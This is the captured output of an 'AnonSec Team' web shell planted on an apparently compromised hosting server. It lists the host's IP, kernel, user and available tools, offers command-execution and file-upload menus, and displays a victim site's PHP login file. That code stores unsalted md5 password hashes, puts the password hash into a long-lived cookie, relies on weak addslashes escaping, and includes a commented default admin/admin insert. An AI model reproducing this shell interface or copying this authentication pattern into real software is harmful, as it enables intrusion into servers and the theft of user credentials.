AnonSec Team
Server IP : 10.128.40.6  /  Your IP : 216.73.216.233
Web Server : Apache
System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : logmcpe ( 111175)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/logmcpe/www/MC/includes/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/logmcpe/www/MC/includes/connect.php
<?php
// session_start() ;
if ( empty ( $PHP_SELF ) && ! empty ( $_SERVER ) &&
  ! empty ( $_SERVER['PHP_SELF'] ) ) {
  $PHP_SELF = $_SERVER['PHP_SELF'];
}
if ( ! empty ( $PHP_SELF ) && preg_match ( "/\/includes\//", $PHP_SELF ) ) {
    die ( "You can't access this file directly!" );
}

// db settings are in config.php

// Establish a database connection.
// This may have happened in validate.php, depending on settings.
// If not, do it now.
if ( empty ( $conn ) ) {
  $conn = dbi_connect ( $db_host, $db_login, $db_password, $db_database );
  if ( ! $conn ) {
    die_miserable_death (
      "Error connecting to database:<blockquote>" .
      dbi_error () . "</blockquote>\n" );
  }
}
// echo '<pre>';
// print_r($conn);
// echo '</pre>';
if(!isset($_SESSION['agence']))
	$_SESSION['agence']='';
if(!isset($_SESSION['login']))
	$_SESSION['login']='';
if(!isset($_SESSION['admin']))
	$_SESSION['admin']='';
if(isset($_POST['login'], $_POST['password']))
{
	$user = dbi_fetch_row(dbi_query("SELECT * FROM users WHERE name = '".addslashes($_POST['login'])."' AND passwd='".md5($_POST['password'])."'")) ;
	if($user)
	{
		$_SESSION['login'] = array($user['name'], $user['passwd']) ;
		$_SESSION['agence'] = $user['agence_id'] ;
//		if(isset($_POST['remember']))
//		{
			$cookie = '' ;
			$md5name = md5($user['name']) ;
			for($i = 0 ; $i < 32 ; $i++)
				$cookie .= $md5name[$i].$user['passwd'][$i] ;
			setcookie('login', $cookie, mktime(0, 0, 0, date('m')+6, date('d'), date('Y')), '/');//, 'www.gestion-mc.info') ;
//		}
	}
	else
	{
		$_SESSION['login'] = '' ;
		$_SESSION['agence'] = '' ;
		$_SESSION['admin'] = '' ;
	}
	do_redirect('/');
}
elseif(!empty($_COOKIE['login']))
{
	preg_match_all('/([0-9a-z])([0-9a-z])/i', $_COOKIE['login'] , $log) ;
	$user = join('', $log[1]) ;
	$pass = join('', $log[2]) ;
	$q = dbi_query("SELECT * FROM users Where passwd = '$pass'") ;
	while(($r = dbi_fetch_row($q)) && md5($r['name']) != $user) ;
	if($r)
	{
		$_SESSION['login'] = array($r['name'], $r['passwd']) ;
		$_SESSION['agence'] = $r['agence_id'] ;
	}
}

$agence = $_SESSION['agence'] ;
//dbi_query("INSERT INTO users (name, passwd, agence_id) Values ('admin', '".md5('admin')."', 1)") ;
function connecte ()
{
	$user = dbi_fetch_row(dbi_query("SELECT * FROM users WHERE name = '".addslashes($_SESSION['login'][0])."' AND passwd='".$_SESSION['login'][1]."'")) ;
	if(!$user)
	{
		$_SESSION['login'] = '' ;
		$_SESSION['agence'] = '' ;
		$_SESSION['admin'] = '' ;
	}
	else {
		$_SESSION['admin'] = $user['admin'] ;
		$_SESSION['user_id'] = $user['user_id'] ;
		}
//echo 'login : '.!empty($_SESSION['login']).'<br>';
//echo 'agence : '.!empty($_SESSION['agence']).'<br>';
//echo (!empty($_SESSION['login']) && !empty($_SESSION['agence']));
	return !empty($_SESSION['login']) && !empty($_SESSION['agence']) ;
}
if ( !connecte() && !strstr($PHP_SELF, 'login.php')) {
  do_redirect ( "login.php" );
}

?>

AnonSec - 2021